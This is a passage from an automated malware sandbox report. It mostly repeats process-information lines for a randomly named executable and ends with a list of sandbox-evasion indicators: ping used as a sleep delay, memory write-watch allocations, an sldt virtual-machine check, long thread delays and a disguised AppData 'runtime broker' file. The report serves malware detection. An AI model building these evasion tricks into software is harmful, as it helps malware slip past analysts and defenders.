                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Uses ping.exe to sleep
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeMemory allocated: 1AB0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeMemory allocated: 1B4A0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: D70000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1A740000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 2AA0000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1AC80000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1040000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1AD30000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 2C70000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1AED0000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1740000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1B330000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: BD0000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1A910000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1000000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1AE00000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 15B0000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1AE50000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1260000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1AE20000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: F80000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1AB90000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: E20000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeMemory allocated: 1A9E0000 memory reserve | memory write watch
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 15_2_00007FFD9BB1A49D sldt word ptr [eax]15_2_00007FFD9BB1A49D
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeThread delayed: delay time: 922337203685477
